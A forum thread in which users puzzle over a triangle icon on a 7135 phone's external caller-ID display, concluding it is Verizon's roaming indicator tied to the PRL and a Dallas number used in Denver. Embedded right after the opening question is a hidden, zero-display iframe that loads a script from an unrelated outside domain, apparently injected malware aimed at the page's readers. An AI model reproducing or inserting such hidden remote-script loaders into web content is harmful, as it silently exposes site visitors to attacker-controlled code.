+ Reply to Thread

Triangle on external caller id?

I'm sure it's something obvious, but can someone please tell me what the triangle to the left of the time display on the external caller id is?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    The 7135 is a marathon, not a Sprint

That one had me a little baffled, too, as I had never seen it before on any other 7135. It was on mine until I activated it, and along with the triangle it also had "Initial programming required" on the main display. My guess is that the two are related. Nothing in the manual mentions it, or at least after a leafing-through.
    LART 'em all! Let /root grep 'em out!

It's a warning, like hazardous warning you see on trucks. Triangle is universal for notice and dangers. It basically telling you that you need to activate your phone before using it.

Hmmm... I never noticed a triangle. Maybe it's only on the ones intended for VZ?
    Please visit my picture site: Robert-O-Rama :)

Yeah, no triangle for me when I got mine.
    I want the triangle!!! I want the triangle!!!
    Just kidding.
    ~'kito
    pdaPhoneHome Moderator

It is there only until you activate the phone. As reported above, it is telling you the phone side won't work until you activate it. I had the triangle and it went away as soon as I activated the phone.

Originally posted by Markito
    Yeah, no triangle for me when I got mine.
    I want the triangle!!! I want the triangle!!!
    Just kidding.
    I'll rochambeau you for it!

Triangle update

I took the phone in to the Verizon store today, and the guy there said that the triangle was the roaming indicator. I have an America's Choice plan, and I'm in Denver, so there shouldn't be any roaming. I think I'm having trouble because I have a Dallas phone number. He tried to update the PRL but was unable to do so, and suggested I try it the next time I'm in Texas. In the meantime, I guess I'll live with the triangle...and hope no roaming charges show up on my bill. I'm a new Verizon customer, and that wouldn't be a good way to start! Oh, and by the way, the phone was already activated when I received it, so that was never the problem.

More updates to come!

Went into service programming, changed my home SID to force it into roaming, and lo and behold, triangle is back! LooneyGuy gets the prize!

Yeah, the triangle is for roaming

OK, so now that we know what it is, does anyone have any idea how I can get rid of it? As I posted earlier, I'm in Denver with America's Choice, so there shouldn't be any roaming. My phone number is Dallas number, so they were unable to update the PRL here at the Verizon store. Are there other ways to update it besides wait until I'm in Texas? Does it seem logical to you Verizon veterans that updating the PRL will fix this? I know just a little about a PRL, like what it stands for...but I don't know all the logistics of it. If I have it updated in Dallas, how will that help me in Colorado? Pardon my ignorance on this